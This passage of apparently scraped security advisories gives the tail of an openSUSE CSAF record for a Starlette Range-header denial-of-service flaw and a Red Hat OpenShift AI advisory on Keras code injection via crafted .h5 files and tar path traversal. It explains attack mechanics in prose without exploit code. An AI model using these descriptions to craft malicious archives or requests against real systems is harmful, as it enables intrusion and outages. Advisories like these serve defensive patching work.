"date": "2026-01-28T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10109-1",
"initial_release_date": "2026-01-28T00:00:00Z",
"revision_history": [
{
"date": "2026-01-28T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-sse-starlette-3.2.0-1.1.aarch64",
"product": {
"name": "python311-sse-starlette-3.2.0-1.1.aarch64",
"product_id": "python311-sse-starlette-3.2.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-sse-starlette-3.2.0-1.1.aarch64",
"product": {
"name": "python312-sse-starlette-3.2.0-1.1.aarch64",
"product_id": "python312-sse-starlette-3.2.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-sse-starlette-3.2.0-1.1.aarch64",
"product": {
"name": "python313-sse-starlette-3.2.0-1.1.aarch64",
"product_id": "python313-sse-starlette-3.2.0-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-sse-starlette-3.2.0-1.1.ppc64le",
"product": {
"name": "python311-sse-starlette-3.2.0-1.1.ppc64le",
"product_id": "python311-sse-starlette-3.2.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-sse-starlette-3.2.0-1.1.ppc64le",
"product": {
"name": "python312-sse-starlette-3.2.0-1.1.ppc64le",
"product_id": "python312-sse-starlette-3.2.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-sse-starlette-3.2.0-1.1.ppc64le",
"product": {
"name": "python313-sse-starlette-3.2.0-1.1.ppc64le",
"product_id": "python313-sse-starlette-3.2.0-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-sse-starlette-3.2.0-1.1.s390x",
"product": {
"name": "python311-sse-starlette-3.2.0-1.1.s390x",
"product_id": "python311-sse-starlette-3.2.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-sse-starlette-3.2.0-1.1.s390x",
"product": {
"name": "python312-sse-starlette-3.2.0-1.1.s390x",
"product_id": "python312-sse-starlette-3.2.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-sse-starlette-3.2.0-1.1.s390x",
"product": {
"name": "python313-sse-starlette-3.2.0-1.1.s390x",
"product_id": "python313-sse-starlette-3.2.0-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-sse-starlette-3.2.0-1.1.x86_64",
"product": {
"name": "python311-sse-starlette-3.2.0-1.1.x86_64",
"product_id": "python311-sse-starlette-3.2.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-sse-starlette-3.2.0-1.1.x86_64",
"product": {
"name": "python312-sse-starlette-3.2.0-1.1.x86_64",
"product_id": "python312-sse-starlette-3.2.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-sse-starlette-3.2.0-1.1.x86_64",
"product": {
"name": "python313-sse-starlette-3.2.0-1.1.x86_64",
"product_id": "python313-sse-starlette-3.2.0-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-sse-starlette-3.2.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.aarch64"
},
"product_reference": "python311-sse-starlette-3.2.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-sse-starlette-3.2.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.ppc64le"
},
"product_reference": "python311-sse-starlette-3.2.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-sse-starlette-3.2.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.s390x"
},
"product_reference": "python311-sse-starlette-3.2.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-sse-starlette-3.2.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.x86_64"
},
"product_reference": "python311-sse-starlette-3.2.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-sse-starlette-3.2.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.aarch64"
},
"product_reference": "python312-sse-starlette-3.2.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-sse-starlette-3.2.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.ppc64le"
},
"product_reference": "python312-sse-starlette-3.2.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-sse-starlette-3.2.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.s390x"
},
"product_reference": "python312-sse-starlette-3.2.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-sse-starlette-3.2.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.x86_64"
},
"product_reference": "python312-sse-starlette-3.2.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-sse-starlette-3.2.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.aarch64"
},
"product_reference": "python313-sse-starlette-3.2.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-sse-starlette-3.2.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.ppc64le"
},
"product_reference": "python313-sse-starlette-3.2.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-sse-starlette-3.2.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.s390x"
},
"product_reference": "python313-sse-starlette-3.2.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-sse-starlette-3.2.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.x86_64"
},
"product_reference": "python313-sse-starlette-3.2.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-62727",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62727"
}
],
"notes": [
{
"category": "general",
"text": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial-of-service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.x86_64",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62727",
"url": "https://www.suse.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "SUSE Bug 1252805 for CVE-2025-62727",
"url": "https://bugzilla.suse.com/1252805"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.x86_64",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.x86_64",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.s390x",
"openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-01-28T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-62727"
}
]
}
RHSA-2025:22759
Vulnerability from csaf_redhat - Published: 2025-12-04 13:06 - Updated: 2026-05-24 14:51Summary
Red Hat Security Advisory: RHOAI 2.22.3 - Red Hat OpenShift AI
Severity
Important
Notes
Topic: Updated images are now available for Red Hat OpenShift AI.
Details: Release of RHOAI 2.22.3 provides these changes:
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A code injection flaw has been discovered in the Keras python module. One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed. This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.
8.6 (High)
Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
38 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 | — |
Workaround
|
Threats
Impact
Important
A path traversal flaw has been discovered in the keras Python library. when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder.
8.3 (High)
Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
38 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 | — |
Workaround
|
|
